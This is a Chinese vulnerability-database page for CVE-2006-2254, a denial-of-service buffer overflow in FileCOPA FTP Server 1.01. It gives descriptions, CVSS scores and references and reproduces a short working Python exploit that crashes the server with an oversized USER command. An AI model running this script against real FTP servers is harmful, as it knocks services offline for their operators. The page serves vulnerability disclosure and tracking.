CVE-2006-2254
CVSS5.0
发布时间 :2006-05-09 06:02:00
修订时间 :2011-03-07 21:35:49
NMCOE    

[原文]Buffer overflow in filecpnt.exe in FileCOPA 1.01 allows remote attackers to cause a denial of service (application crash) via a username with a large number of newline characters.


[CNNVD]FileCOPA filecpnt.exe 缓冲区溢出(CNNVD-200605-149)

        FileCOPA 1.01的 filecpnt.exe存在缓冲区溢出。远程攻击者可以借助带有大量换行字符的文件名,引起拒绝服务 (应用程序崩溃)。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2254
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2254
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200605-149
(官方数据源) CNNVD

- 其它链接及资源

http://www.vupen.com/english/advisories/2006/1679
(UNKNOWN)  VUPEN  ADV-2006-1679
http://secunia.com/advisories/20033
(VENDOR_ADVISORY)  SECUNIA  20033
http://blacksecurity.org/exploits/38/FILECOPA_V1.01_and_Below_Pre_Authentication_Remote_Overflow/111.html
(UNKNOWN)  MISC  http://blacksecurity.org/exploits/38/FILECOPA_V1.01_and_Below_Pre_Authentication_Remote_Overflow/111.html
http://xforce.iss.net/xforce/xfdb/26300
(UNKNOWN)  XF  filecopa-user-dos(26300)
http://www.securityfocus.com/bid/17881
(UNKNOWN)  BID  17881
http://www.osvdb.org/25436
(UNKNOWN)  OSVDB  25436

- 漏洞信息

FileCOPA filecpnt.exe 缓冲区溢出
中危 缓冲区溢出
2006-05-09 00:00:00 2006-05-09 00:00:00
远程  
        FileCOPA 1.01的 filecpnt.exe存在缓冲区溢出。远程攻击者可以借助带有大量换行字符的文件名,引起拒绝服务 (应用程序崩溃)。

- 公告与补丁

        暂无数据

- 漏洞信息 (1754)

FileCOPA FTP Server <= 1.01 (USER) Remote Pre-Auth DoS (EDBID:1754)
windows dos
2006-05-05 Verified
0 Bigeazer
[点击下载] [点击下载]
### FILECOPA DOS
### www.filecopa.com
### Found Jan 19 2006, Tested again on the new release 6 April 2006
### BY Bigeazer 
### http://blacksecurity.org

### They are selling this software for $39.95...
### oh well.. maybe they shoud fix it first?

#
# It appears that FileCopa does not handle alot of new line char
# in the USER login.  This is in the filecpnt.exe file.
# 
# This is only a DOS, that kills the ftp process


import sys,os,string
import socket
import struct
import time

print "-------------------------------"
print "- FileCopa DOS"
print "- Found by: bigeazer"
print "- Should have crashed FileCopa"
print "-------------------------------"

buffer = "\x0a" * 248 + struct.pack('<L',0xdeadbeef)  * 960 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
	conn = s.connect((sys.argv[1],21))
except:
	print "- Unable to connect. exiting."
	sys.exit(1)

d = s.recv(1024)
time.sleep(1)
s.send('USER %s\r\n' % buffer)
time.sleep(1)
sys.exit(0)

# milw0rm.com [2006-05-05]
		

- 漏洞信息

25436
FileCOPA FTP Server USER Command DoS
Remote / Network Access Denial of Service
Loss of Availability
Exploit Public

- 漏洞描述

FileCOPA contains a flaw that may allow a remote denial of service. The issue is triggered when a long USER command is sent, and will result in loss of availability for the service.

- 时间线

2006-05-08 2006-01-19
2006-05-08 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站